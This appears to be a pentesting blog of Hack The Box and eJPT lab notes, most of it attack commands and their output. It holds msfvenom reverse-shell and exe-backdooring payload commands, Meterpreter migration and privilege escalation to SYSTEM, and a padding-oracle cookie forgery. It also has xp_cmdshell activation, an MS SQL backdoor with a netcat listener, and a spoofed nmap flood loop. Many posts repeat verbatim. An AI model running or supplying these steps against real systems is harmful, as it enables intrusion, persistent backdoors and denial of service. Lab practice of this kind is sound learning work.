Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP
Vulnerability Scan:
OpenVAS
Web Scan:
dirb
Dirbuster
Yyj-websprider
Paros
Burp Suite
Sqlmap
Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit
Backdoor:
msfvenom
msfconsole handler
Thursday, May 28, 2020
[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
Monday, May 25, 2020
Sunday, May 24, 2020
[HTB]An example of Padding Oracle Attack
1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
Saturday, May 23, 2020
[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet
#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creats a simple TCP Payload for Android
Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creats a Simple TCP Shell for WAR
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
Command Info
msfvenom -l encoders Lists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Binds an exe with a Payload and encodes it
How do I get the meterprater shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creats a simple TCP Payload for Android
Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creats a Simple TCP Shell for WAR
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
Command Info
msfvenom -l encoders Lists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Binds an exe with a Payload and encodes it
How do I get the meterprater shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Thursday, May 21, 2020
[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Wednesday, May 20, 2020
[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows
meterpreter > getuid
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Tuesday, May 19, 2020
[HTB] Some usage of smbclient
# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
Monday, May 18, 2020
[Linux]Use Zip to compress files in Linux with password protection
# zip -re ./test.zip ./file1 ./file2 ./folder1 ./folder2
Thursday, May 14, 2020
[HTB]Knock down MS SQL Server through xp_cmdshell
Assume that at the beginning an user/password pair has been obtained:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
[HTB]Listing and accessing remote shares through smbclient
Show remote shares:
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick up one and access it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick up one and access it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
[HTB]Auto Scan through NMAP
#!/bin/bash
echo TARGET IP:
read ip
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $ip
echo TARGET IP:
read ip
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $ip
Wednesday, May 13, 2020
[HTB]POST HTTP data through Command Line
Example:
# curl -d "param1=value1¶m2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
# curl -d "param1=value1¶m2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
Tuesday, May 12, 2020
Saturday, May 9, 2020
Thursday, May 7, 2020
[eJPT][nmap]Apply Nmap to Synflood
Example #1 Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.
Example #2 Command:
#watch -n 0.1 "nmap -e eth0 -T5 -p443 -D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND 10.10.77.245"
-e eth0: Specify the network adapter sending the packets.
-T5: The fastest rate.
-T5: The fastest rate.
-p443: Scan TCP443 port of the target.
-D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND: Spoofing the packet sources as 12.0.0.1, 12.0.0.2, 12.0.0.3, a random IP, my own IP, and another random IP.
-D 12.0.0.1,12.0.0.2,12.0.0.3,RND,ME,RND: Spoofing the packet sources as 12.0.0.1, 12.0.0.2, 12.0.0.3, a random IP, my own IP, and another random IP.
10.10.77.245: The target.
The nmap scan would be repeatedly launched every 0.1 second by using the watch command.
The nmap scan would be repeatedly launched every 0.1 second by using the watch command.
Monday, May 4, 2020
[eJPT][spider]A script for crawling websites as Web Grep
#!/usr/bin/perl -w
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use Cwd;
$|=1;
$original_dir = getcwd;
for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir -p /tmp/$folder");
chdir "/tmp/$folder";
print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
$target_url=<STDIN>;
chop($target_url);
if(defined($target_url)){
;
}else{
die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
$mrd=<STDIN>;
chop($mrd);
if($mrd ne ""){
;
}else{
$mrd=5;
}
print("Keyword (Default: password): ");
$keyword=<STDIN>;
chop($keyword);
if($keyword ne ""){
;
}else{
$keyword="password";
}
=head
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut
system("wget -q -r -l $mrd $target_url");
print("----------------------------------------\n");
system("grep -nR -i $keyword");
chdir $original_dir;
system("rm -Rf /tmp/$folder");
exit(0);
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use Cwd;
$|=1;
$original_dir = getcwd;
for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir -p /tmp/$folder");
chdir "/tmp/$folder";
print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
$target_url=<STDIN>;
chop($target_url);
if(defined($target_url)){
;
}else{
die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
$mrd=<STDIN>;
chop($mrd);
if($mrd ne ""){
;
}else{
$mrd=5;
}
print("Keyword (Default: password): ");
$keyword=<STDIN>;
chop($keyword);
if($keyword ne ""){
;
}else{
$keyword="password";
}
=head
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut
system("wget -q -r -l $mrd $target_url");
print("----------------------------------------\n");
system("grep -nR -i $keyword");
chdir $original_dir;
system("rm -Rf /tmp/$folder");
exit(0);
Sunday, May 3, 2020
[eJPT]Crack MS SQL Server
The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain an username/password pair and would like to verify the effectiveness the pair by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain an username/password pair and would like to verify the effectiveness the pair by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
[eJPT]Find files in Windows
Find files through their filename:
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users
Subscribe to:
Posts (Atom)